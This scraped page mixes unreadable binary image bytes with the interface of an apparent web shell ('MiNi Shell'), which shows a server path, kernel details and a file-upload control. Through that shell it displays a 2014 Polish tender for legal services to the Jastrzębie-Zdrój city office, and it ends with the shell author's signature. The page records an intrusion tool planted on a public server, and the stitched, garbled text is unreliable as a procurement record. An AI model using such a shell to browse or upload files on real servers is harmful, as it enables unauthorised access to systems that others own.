JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140116/17846-N-2014.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Obsługa prawna Urzędu Miasta Jastrzębie-Zdrój</b><br>
<b>Numer ogłoszenia: 17846 - 2014; data zamieszczenia: 16.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Jastrzębie Zdrój , Al. Józefa Piłsudskiego 60, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 0-32 47 85 133, faks 0-32 47 85 350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa prawna Urzędu Miasta Jastrzębie-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa obsługa prawna Urzędu Miasta Jastrzębie-Zdrój obejmująca w szczególności:
1.sporządzanie opinii prawnych i udzielanie porad prawnych w zakresie szeroko  rozumianej  działalności  Urzędu Miasta, w tym m.in. przygotowywanie opinii prawnej nt. zasadności kierowania zawiadomienia o podejrzenie popełnienia przestępstwa oraz (jeżeli taka jest opinia) przygotowanie treści projektu tego zawiadomienia.
2.sporządzenie projektów umów i opiniowanie umów, porozumień.
3.pomoc w opracowaniu aktów prawa miejscowego, uchwał, zarządzeń Prezydenta, i innych regulacji wewnętrznych,  zarządzeń wewnętrznych, regulaminów, instrukcji itp.
4.rozpatrywanie skarg i wniosków 
5.obsługa prawna z zakresu prawa zamówień publicznych, w tym uczestnictwo w pracach komisji przetargowych w charakterze członków komisji,
6.reprezentowanie zamawiającego przed organami wymiaru sprawiedliwości, organami administracji publicznej i urzędami,
7.uczestniczenie na życzenie zamawiającego w prowadzonych z udziałem zamawiającego rokowaniach i negocjacjach, których celem jest nawiązanie, zmiana lub rozwiązanie stosunku prawnego,
8.zapewnienie w ramach powyższych działań wszelkich wymaganych prawem czynności niezbędnej do skutecznej ochrony interesów zamawiającego,
9.osobiste uczestnictwo w ważnych posiedzeniach zwoływanych przez władze miasta
10.redagowanie pism o znaczeniu prawnym i urzędowym dla zamawiającego,
11.windykacja należności,
12.nadzór nad egzekucją należności cywilnoprawnych,
13.obrona interesów  zamawiającego  w ewentualnych  postępowaniach  i  sporach
 z jego udziałem,
14.udzielanie wyjaśnień, co do obowiązujących przepisów prawa,
15.informowanie o zmianach w obowiązującym stanie prawnym,
16.obsługa prawna  projektów  finansowanych  ze  środków  Unii  Europejskiej,  o ile realizowane projekty nie posiadają odrębnej  obsługi prawnej,  albo  koordynowanie działań  podejmowanych  przez  Zamawiającego    w  związku  z  udzielaniem  zamówień publicznych   w ramach  realizowanych  projektów unijnych  we współpracyz kancelariami  prawnymi  obsługującymi   w/w  projekty,
17.pełnienie  zastępstwa   prawnego i procesowego  przed urzędami i  sądami,
18.osobista  obecność  co  najmniej  jednej osoby  z uprawnieniami  radcy  prawnego lub adwokata  na  sesjach  Rady Miasta, a  na  żądanie   Przewodniczącego  Komisji i   Prezydenta  Miasta  uczestnictwo  w  posiedzeniach  tych  organów  również poza godzinami funkcjonowania Urzędu.
19.Zapewnienie  obsługi  prawnej  poza  siedzibą  Urzędu  Miasta, jeżeli jest to niezbędne do wykonania określonej czynności.
20.Wykonywanie  innych  czynności  niezbędnych   do   należytego  i   prawidłowegowykonania przedmiotu zamówienia,
21.Wykonawca będzie wykonywał ww. czynności w terminach gwarantujących ich 
należyte  wykonanie,  z  należytą  starannością  wymaganą  przy  świadczeniu   tego rodzaju usług i z należytą troską o finanse publiczne oraz interes prawny Zamawiającego.
22.Wykonawca zobowiązuje się do zapewnienia minimalnego standardu świadczonych usług, na  okoliczność  czego  zobowiązany  jest   do  wyznaczenia   koordynatora   obsługi prawnej  jako odpowiedzialnego    za  całokształt  spraw   prowadzonych   przez kancelarie prawną.
23.Wykonawca  zapewnia   świadczenie   obsługi   prawnej  w  siedzibie   Zamawiającego według ustalonego  z Zamawiającym harmonogramem pracy. 
24.Wykonawca   zapewni   kontakt   telefoniczny,   e-mailowy   lub   faxem   w
 pozostałych   godzinach   urzędowania    Zamawiającego   pod    wskazanymi  
numerami  telefonów, adresem e-mailowym.
25.Dodatkowo, w  sprawach  nagłych  i  nieprzewidzianych Zamawiający  wymaga
 od  Wykonawcy dojazdu radcy prawnego lub adwokata do siedziby Zamawiającego 
poza   ustalonym   harmonogramem  dyżurów,  w  ciągu  30   minut  od   jego 
telefonicznego wezwania .
26.Czynności   wykonywane  będą  w  siedzibie Zamawiającego  w dniach  i godzinach pracy Urzędu Miasta Jastrzębie-Zdrój. Zamawiający  wymaga aby  w/w
 czynności świadczone  były co najmniej  przez   5 dni  w tygodniu  w wymiarze 
  co  najmniej  7  godzin  dziennie , w  tym  czasie  wymagana  jest  obecność  w 
siedzibie  Zamawiającego  co  najmniej  1  osoby  spełniającej  warunki   udziału 
w  postępowaniu,  o  których  mowa  w  pkt 7.2.2.  SIWZ. Do  ilości  godzin   objętych dyżurem w siedzibie Urzędu Miasta nie wlicza się obsługi pełnionej poza siedzibą Urzędu, w tym podczas sprawowania zastępstwa procesowego przed sądami i innymi organami.
27.Wykonawca  upoważniony  jest  do korzystania z dwóch pomieszczeń znajdujących się w budynku   Urzędu  Miasta wraz z ich wyposażeniem ruchomym.
28.Wykonawca  zawrze  umowę   najmu  jednego  pomieszczenia   i  poniesie   wszelkie koszty wiążące z jego  utrzymaniem, a w szczególności należności za czynsz najmu,telefon, wywóz nieczystości, centralne ogrzewanie.
29.Wykonawca  winien być  ubezpieczony od odpowiedzialności zawodowej  z  tytułu czynności objętych zakresem  umowy zlecenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że w okresie ostatnich 3 lat przed upływem terminu składania ofert,  wykonał, a w przypadku świadczeń okresowych i  ciągłych   wykonuje   co najmniej 1 usługę   polegającą na świadczeniu kompleksowej obsługi prawnej  na rzecz  jednostek samorządu terytorialnego o statusie miasta na prawach powiatu (tj urzędów miast)  nieprzerwanie  przez okres  co najmniej  12 miesięcy, o wartości nie mniejszej  niż  200 000 zł.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wwykonawca   udokumentuje,  że  dysponuje   lub   będzie   dysponować   przy 
   realizacji  zamówienia min 4 osobami posiadającymi:
a)   co najmniej roczne doświadczenie  w zakresie   bieżącej obsługi prawnej  prowadzonej nieprzerwanie  przez okres  co najmniej 12 m-cy  w jednostkach  samorządu terytorialnego  o statusie miasta na prawach powiatu (tj. urzędów miast) w zakresie  problematyki  związanej  z  samorządem  terytorialnym, finansami publicznymi, zamówieniami  publicznymi,  prawem  budowlanym,  
b) Wszystkie wskazane osoby muszą posiadać uprawnienia  do  wykonywania  zawodu radcy prawnego (zgodnie z ustawą o   z dnia  6 lipca  1982 r. o radcach prawnych  ( Dz. U. z 2010, nr 10, poz. 65) lub  adwokata (zgodnie z  ustawą z dnia   26 maja  1982r.  Prawo o  adwokaturze (Dz. U.  z 2009, nr 146, poz. 1188)  lub prawnika  zagranicznego  wykonującego stałą praktykę  na podstawie  ustawy z   dnia  5  lipca 2002r.   o świadczeniu   przez   prawników  zagranicznych  pomocy prawnej w Rzeczypospolitej  Polskiej (Dz. U. z 2002, nr 126, poz. 1069) tzn. posiadać  stosowny  wpis  na listę adwokatów/radców prawnych.

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wypełniony formularz oferty wraz z oświadczeniem o zapoznaniu się z treścią specyfikacji i projektem umowy, o związaniu ofertą oraz aktualności dostarczonych zaświadczeń - zgodny w treści z wzorem stanowiącym - załącznik nr 1; 
2)pełnomocnictwo do reprezentowania wykonawcy w postępowaniu, z którego wynika zakres, podpisane przez osoby uprawnione do reprezentowania Firmy (jeżeli wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika - jak w punkcie 9 SIWZ
3)Pisemne zobowiązanie do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (przykładowy wzór - załącznik nr 7)
Uwaga: Pełnomocnictwo i pisemne zobowiązanie powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50.00</li>
<li>2 - Doświadczenie wykwalifikowanej kadry - 50.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie możliwość dokonania zmian postanowień niniejszej umowy w zakresie zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy, a od których wymagano określonego doświadczenia, wykształcenia i uprawnień na inne legitymujące się doświadczeniem, wykształceniem i uprawnieniami spełniającymi wymóg siwz.
2.Zmiana, o której mowa w pkt 1 będzie niemożliwa, w przypadku, gdy dotyczy osoby ocenianej na podstawie kryteriów  oceny ofert, chyba, ze w zamian za taką osobę zostanie zaproponowana osoba o doświadczeniu, wykształceniu i uprawnieniach co najmniej takich samych jakie posiada osoba zamieniana.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Jastrzębie -Zdrój, Al. Józefa Piłsudskiego 60 pok. B 006; 44-335 Jastrzębie-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2014 godzina 11:00, miejsce: Urząd Miasta Jastrzębie -Zdrój, Al. Józefa Piłsudskiego 60 pok. B 006; 44-335 Jastrzębie-Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com